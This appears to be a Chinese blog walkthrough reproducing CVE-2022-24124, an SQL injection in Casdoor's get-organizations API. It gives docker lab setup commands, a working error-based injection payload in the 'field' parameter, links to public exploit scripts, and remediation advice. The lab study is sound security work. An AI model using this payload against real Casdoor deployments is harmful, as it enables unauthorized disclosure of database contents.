Casdoor SQL注入漏洞复现,编号:CVE-2022-24124

最新推荐文章于 2024-04-21 14:08:32 发布
最新推荐文章于 2024-04-21 14:08:32 发布
阅读量2.4k 收藏 8
点赞数
分类专栏: 渗透测试 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/heartsk/article/details/126621047
版权

前言:Casdoor

  Casdoor 是一个基于 OAuth 2.0 / OIDC 的中心化的单点登录(SSO)身份验证平台,简单来说,就是 Casdoor可以帮你解决用户管理的难题,你无需开发用户登录、注册等与用户鉴权相关的一系列功能,只需几个步骤进行简单配置,与你的主应用配合,便可完全托管你的用户模块,简单省心,功能强大。Casdoor目前作为 Casbin 社区项目统一使用的鉴权平台,并且项目已开源。

编号

 CVE编号:CVE-2022-24124
 CNPD编号:CNPD-202201-7304

影响版本

 危险等级:高 ( 7.5 HIGH )

 POC/EXP:已公开

Casdoor < Casdoor 1.13.1  //1.13.1版本之前均受影响

漏洞简介

此漏洞属于Sql注入漏洞,在查询API 存在与字段和值参数相关的SQL 注入漏洞,如api/get-organizations 所示。

复现

1、搭建环境

拉取漏洞镜像

docker pull vulfocus/casdoor:1.13.0

请添加图片描述

启动漏洞环境

docker run -itd -p 8000:8000 -it -d vulfocus/casdoor:1.13.0

请添加图片描述

2、进行复现操作

 打开漏洞环境页面

请添加图片描述

直接利用poc参数进行注入

/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),3)

请添加图片描述

解决方案

1、升级官方最新安全版本。
2、加强对用户输入信息进行验证和过滤,在具体检查输入或提交的变量时,对于括号、冒号等危险字符进行转换或者过滤。

漏洞验证工具POC

1、 直接利用POC:/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),3)

2、利用脚本https://github.com/ColdFusionX/CVE-2022-24124

相关信息:

https://nvd.nist.gov/vuln/detail/CVE-2022-24124

https://github.com/ColdFusionX/CVE-2022-24124

https://github.com/0xAbbarhSF/CVE-2022-24124

观世音_遮天实验室
关注
  • 0
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【春秋云镜】CVE-2022-24124 Casdoor api get-oraganizations SQL注入漏洞 解题思路
Dark-Specter的博客
12-19 928
报错注入的原理是利用应用程序在处理用户输入时存在漏洞,攻击者通过巧妙构造的恶意输入,触发应用程序执行包含SQL查询的操作,并故意引发数据库系统的错误,以从错误消息中获取敏感信息。:应用程序通常允许用户在表单字段、URL参数或其他输入方式中提供数据,这些数据将用于构建SQL查询。如果应用程序未正确验证和处理用户输入,就有可能存在漏洞。:攻击者利用这个漏洞,构造恶意输入,将恶意SQL代码插入到用户输入中,这个恶意SQL代码将成为应用程序生成的SQL查询的一部分。:攻击者的恶意输入旨在触发SQL查询中的错误。
春秋云境:CVE-2022-24124Casdoor api get-oraganizations SQL注入
m0_65712192的博客
07-23 925
Casdoor是开源的一个身份和访问管理 (IAM) / 单点登录 (SSO) 平台,带有支持 OAuth 2.0 / OIDC 和 SAML 身份验证的 Web UI 。 Casdoor 1.13.1 之前存在安全漏洞,该漏洞允许攻击者通过api/get-organizations进行攻击。
网络安全SQL注入漏洞复现(中篇)(技术进阶)
最新发布
weixin_70911257的博客
04-21 1146
在我们手工注入时,我们应当根据实际情况判断用那种注入,以及要知道每一种注入方法的原理,手工注入固然慢,但是这才是灵魂所在,使用sqlmap工具虽然高效但是没有灵魂嘞。
春秋云境:CVE-2022-24124
一只爱吃橙子的羊
12-02 2386
Casdoor是开源的一个身份和访问管理 (IAM) / 单点登录 (SSO) 平台,带有支持 OAuth 2.0 / OIDC 和 SAML 身份验证的 Web UI 。 Casdoor 1.13.1 之前存在安全漏洞,该漏洞允许攻击者通过api/get-organizations进行攻击。
【春秋云境】CVE-2022-24124复现
小高工作室
12-01 1081
【代码】【春秋云境】CVE-2022-24124复现
Casdoor get-organizations SQL注入漏洞 CVE-2022-24124
weixin_46801402的博客
11-02 1006
Casdoor get-organizations SQL注入漏洞 CVE-2022-24124
vulhub靶场sql注入漏洞复现
赵花花08042的博客
12-13 3128
Django JSONField/HStoreField SQL注入漏洞CVE-2019-14234) https://github.com/vulhub/vulhub/blob/master/django/CVE-2019-14234/README.zh-cn.md https://mp.weixin.qq.com/s?__biz=MzA4NzUwMzc3NQ==&mid=2247483996&idx=1&sn=4254dc0a54003cccb29dd42935f8ccea.
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
05-05
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
CVE-2013-6117:CVE-2013-6117
04-29
CVE-2013-6117 $ ./CVE-2013-6117 -hOptions: -h, --help display help information -f, --filename File containing list of IP addresses -t, --target Target IP -n, --threads No of concurrent threads ...
漏洞复现Casdoor-任意文件读取
2301_80115097的博客
04-02 303
Casdoor系统static存在任意文件读取漏洞漏洞描述】Casdoor是一个基于OAuth 2.0、OIDC、SAML 和 CAS 的,UI-first的身份和访问管理(IAM)/单点登录(SSO)平台。使用 Go 和react开发,前后端分离,内置第三方应用登录服务。
SQL注入漏洞复现:探索不同类型的注入攻击方法
weixin_43263566的博客
08-26 1141
基于错误的注入(Error-based Injection):攻击者通过构造恶意的SQL语句,利用应用程序返回的错误信息来获取数据库中的敏感信息。基于联合查询的注入(Union-based Injection):攻击者通过在注入点处构造特殊的SQL语句,利用UNION命令将其他查询结果合并到原始查询中,从而获取额外的数据。基于时间延迟的注入(Time-based Injection):攻击者通过在注入点处构造特殊的SQL语句,
DVWA-sql注入漏洞复现
qq_68238790的博客
12-04 174
SQL注入漏洞Web层面最高位的漏洞之一。所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击。当应用程序使用输入内容来构造动态sql语句以访问数据库时,会发生sql注入攻击。如果代码使用存储过程,而这些存储过程作为包含未筛选的用户输入的字符串来传递,也会发生sql注入
Django SQL注入漏洞 CVE-2022-28347
蚁景网安学院
05-18 930
漏洞简介在Django 2.2 的 2.2.28 之前版本、3.2 的 3.2.13 之前版本和 4.0 的 4.0.4 之前版本中的 QuerySet.deexplain() 中发现了SQL注入问题。这是通过传递一个精心编制的字典(带有字典扩展)作为**options参数来实现的,并将注入负载放置在选项名称中。影响版本2.2 =< Django < 2.2.283.2 =< D...
DataEase SQL注入漏洞 (CVE-2022-34114)
weixin_68999845的博客
07-21 853
CVE-2022-34114漏洞搭建及复现
XMall 开源商城 SQL注入漏洞(CVE-2024-24112)
qq_67810151的博客
02-21 806
XMall 开源商城 SQL注入漏洞
youdiancms 9.5.0 版本 SQL注入(vulfocus复现
qq_40646572的博客
04-24 1124
从上述信息,可以看到,web服务的80端口被映射到62461端口,并且该服务对外开启了3306端口并映射到20130 端口。并且给了数据库的相关信息。
春秋云境:CVE-2022-29464
07-28
根据引用\[1\],CVE-2022-29464是Orange Tsai发现的WSO2上的严重漏洞。该漏洞是一种未经身份验证的无限制任意文件上传,允许未经身份验证的攻击者通过上传恶意JSP文件在WSO2服务器上获得RCE(远程命令执行)权限。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值